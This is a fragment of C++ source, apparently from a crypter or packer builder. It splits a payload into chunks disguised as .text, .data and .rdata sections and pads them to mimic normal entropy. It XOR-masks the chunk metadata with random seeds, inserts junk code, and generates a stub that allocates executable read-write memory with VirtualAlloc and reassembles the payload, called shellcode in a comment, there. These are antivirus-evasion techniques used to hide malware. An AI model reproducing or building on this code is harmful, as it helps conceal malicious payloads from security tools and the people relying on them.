DWORD sizes[4];

		sizes[0] = random.get_less(0,result->size*0.6);
		sizes[1] = result->size*0.6 - sizes[0];
		sizes[2] = result->size*0.2;
		sizes[3] = result->size - (sizes[0] + sizes[1] + sizes[2]);

		mPayloadEntropy entropy;

		entropy.set_data(result->data, sizes[0] + sizes[1]);

		BYTE text_byte = entropy.get_top_byte();

		offset = payload->add_chunk(PAYLOAD_CHUNK_TEXT1, offset, &result->data[offset], sizes[0], text_byte, 5.0, true); // .text before
		offset = payload->add_chunk(PAYLOAD_CHUNK_TEXT2, offset, &result->data[offset], sizes[1], text_byte, 6.0, true); // text after
		offset = payload->add_chunk(PAYLOAD_CHUNK_DATA,  offset, &result->data[offset], sizes[2], 0, 6.0, true); // data 
		offset = payload->add_chunk(PAYLOAD_CHUNK_RDATA, offset, &result->data[offset], sizes[3], 0, 5.6, true); // rdata*/
		
		lines.add_first(MCODELINE_FLAG_NO_TRASH, "PAYLOAD_CHUNK payload_chunks[%d];\r\n", (payload->get_count() + 1));

		// add payloads
		for(int i = 0; i < payload->get_count(); i++)
		{
			PMPAYLOAD_CHUNK chunk = payload->get_chunks() + i;
			
			if( chunk->id==PAYLOAD_CHUNK_RCDATA )
			{
				chunk->user_data = 1;

				lines.add_random("payload_chunks[%d].entr_data = ((DWORD_PTR)hInstance + 0x%0.8X);\r\n", i, patcher->get_rcdata_marker(chunk->user_data));
			}else{
				lines.add_random("payload_chunks[%d].entr_data = (DWORD_PTR)payload_%d;\r\n", i, chunk->id);
			}
			lines.add_random("payload_chunks[%d].entr_size = 0x%0.8X;\r\n", i, chunk->entr_size ^ chunk->seed);
			lines.add_random("payload_chunks[%d].offset = 0x%0.8X;\r\n", i, chunk->offset ^ chunk->seed);
			lines.add_random("payload_chunks[%d].orig_size = 0x%0.8X;\r\n", i, chunk->orig_size ^ chunk->seed);
			lines.add_random("payload_chunks[%d].use_entr = %d;\r\n", i, chunk->use_entr);

			if( chunk->use_entr )
			{
				lines.add_random("payload_chunks[%d].max_step = 0x%0.8X;\r\n", i, (chunk->entr_size/(chunk->entr_size - chunk->orig_size)) ^ chunk->seed);
			}
		}
		DWORD end = (DWORD)random.get();

		lines.add_random("payload_chunks[%d].entr_data = 0x%0.8X;\r\n", payload->get_count(), end);

		CHAR hash_string[128];

		lines.add("PDWORD ppayload = (PDWORD)VirtualAlloc(NULL,%d,MEM_COMMIT,PAGE_EXECUTE_READWRITE);\r\n", result->size + payload->get_max_entr_size()*2 );
		lines.add("PBYTE ptemp    = (PBYTE)ppayload + %d;\r\n", result->size);
		lines.add("PBYTE pdata = (PBYTE)ptemp + %d;\r\n", payload->get_max_entr_size());
		lines.add_random("DWORD chunk_hash = 0x%0.8X;\r\n", payload->get_first_seed());

		// fill pshellcode from chunks
		lines.add("PPAYLOAD_CHUNK cur_chunk = payload_chunks; DWORD i,j;\r\n");

		lines.set_trash_flags(IS_LOOP);

		lines.add("while( cur_chunk->entr_data != 0x%0.8X )\r\n", end);
		lines.push();
			
			lines.add("DWORD offset = 0;\r\n");
			lines.add("DWORD entr_hash = chunk_hash;\r\n");
			lines.add("mem_zero(pdata,%d);\r\n",payload->get_max_entr_size());
			lines.add("i = cur_chunk->orig_size ^ chunk_hash;\r\n");
			lines.add("while( i < (cur_chunk->entr_size ^ chunk_hash) )\r\n");
			lines.push();

				lines.add("if( !cur_chunk->use_entr ) break;\r\n");
				lines.add("DWORD pos = entr_hash%%(cur_chunk->max_step ^ chunk_hash);\r\n");
				lines.add("pdata[offset + pos] = %d;\r\n", random.get_less(1,0xFF));
				lines.add("i++;\r\n");
				lines.add("offset += (cur_chunk->max_step ^ chunk_hash);\r\n");	

				mPayloadChunks::operations2str(hash_string, "entr_hash", payload->get_entr_ops(), payload->get_entr_ops_count());
				lines.add(hash_string);

			lines.pop();

			lines.add("i = 0, j = 0;\r\n");
			lines.add("while( i < (cur_chunk->entr_size ^ chunk_hash) )\r\n");
			lines.push();

				lines.add("if( pdata[i]==0 )\r\n");
				lines.push();
					lines.add("ptemp[j++] = *((PBYTE)cur_chunk->entr_data + i);\r\n");
				lines.pop();
				lines.add("i++;\r\n");

			lines.pop();

			lines.add("i = cur_chunk->orig_size ^ chunk_hash;\r\n");
			lines.add("offset = cur_chunk->offset ^ chunk_hash;\r\n");

			lines.add("__movsb((PBYTE)ppayload + offset, ptemp, i);\r\n");
	
			mPayloadChunks::operations2str(hash_string, "chunk_hash", payload->get_chunk_ops(), payload->get_chunk_ops_count());
			lines.add(hash_string);
			lines.add("cur_chunk++;\r\n");

		lines.pop();
